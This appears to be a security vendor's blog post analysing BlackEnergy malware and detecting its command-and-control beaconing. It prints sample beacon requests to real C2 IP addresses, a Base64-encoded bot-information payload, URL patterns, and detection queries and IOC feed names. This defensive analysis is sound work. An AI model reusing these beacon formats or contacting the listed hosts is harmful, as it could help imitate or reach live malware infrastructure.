BlackEnergy is a modular backdoor that can be used for several purposes, like espionage and downloading of destructive components to compromise target systems. BlackEnergy malware family has been around since 2007. It started as an HTTP-based botnet for DDoS attacks.
It evolved to BlackEnergy2, a driver component based rootkit installed as a backdoor and now it has evolved to its latest version, BlackEnergy3, which is behind the recent attacks against Ukraine electrical power industry by cybercriminals.
The malware spreads mainly through targeted phishing attacks by e-mail containing Microsoft Office files with malicious VBA macros as attachments.
BlackEnergy uses its modular architecture that supports several plugins to download and keep running both backdoors (such as variants of Dropbear SSH backdoor) and several kinds of plugins (such as a new destructive plugin called KillDisk, used in the recent Ukraine attacks).
In this blog post, we will discuss how to detect its C2 beaconing activity.
Once the malware is installed in the target system, the backdoor will listen and communicate with the remote C2 server.
Following is an example of a HTTP request sent from the malware to the C2:
POST /Microsoft/Update/KC074913.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 5.149.254.114
Content-Length: 143
Connection: Keep-Alive
body=Yl9pZD1URVFVSUxBQk9PTUJPT01fODUwQjEzNTgwOUM5MThFMURFQzI2M0I2QTI3OTdBNzAmYl9nZW49cmVsZWFzZSZiX3Zlcj0yLjImb3Nfdj0yNjAwJm9zX3R5cGU9MA==
Where ‘body’ contains Base64 encoded data which refers to bot and operating system information:
b_id=TEQUILABOOMBOOM_850B135809C918E1DEC263B6A2797A70&b_gen=release&b_ver=2.2&os_v=2600&os_type=0
Following is an example of a C2 response sent to the malware:
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Mar 2015 09:44:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=5
X-Powered-By: PHP/5.3.3
dNkldvO6wOA1apbaR1y/RhcCeSIII2KqDjHRrHXwucC595zfWniFePywimQBVXr+WY80K6qE8qmQO65HvIczOuJdsBQ+bzwNQ8JsnqFDolhczofU9RQlhtoGt8Eb7HlY4s8=
Where the C2 response is encrypted.
Different malware variants may use different directory or filenames in the URL, for example:
URL: http: //<ip address>:80/osupdate/getcfg.php
TYPE: POST
USER AGENT: iexplorer8.0
URL: http: //<ip address>:80/update/check.php
TYPE: POST
USER AGENT: iexplorer8.0
URL: http: //<ip address>/551/getcfg.php
TYPE: POST
USER AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Other samples have the ability to use HTTP CONNECT tunneling to connect to proxy servers, as can be seen in the following POST request:
CONNECT <ip address>:443 HTTP/1.0
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 5.79.80.166:443
Content-Length: 0
Proxy-Connection: Keep-Alive
Pragma: no-cache
The screenshot below shows the network activity in RSA Security Analytics investigator:
Assuming the appropriate meta keys are enabled, this blog report suggests the following query to detect the malware activity:
risk.info = 'http direct to ip request' &&
risk.info = 'http1.1 without connection header' &&
service=80 &&
extension=php &&
referer !exists &&
action=put && content='application/x-www-form-urlencoded'
This query is generic and may catch still suspicious traffic, but not necessarily belonging to BlackEnergy, since the directory and filenames may vary depending on the sample.
Scan results for a BlackEnergy variant can be viewed here.
The full and complete BlackEnergy report can be found here.
All of the IOCs from those HTTP sessions were added to the following RSA FirstWatch Live feeds:
- RSA FirstWatch APT Threat Domains
- RSA FirstWatch APT Threat IPs
If threat.desc meta key is enabled then you can use the following app rule:
threat.desc = 'apt-blackenergy-c2'
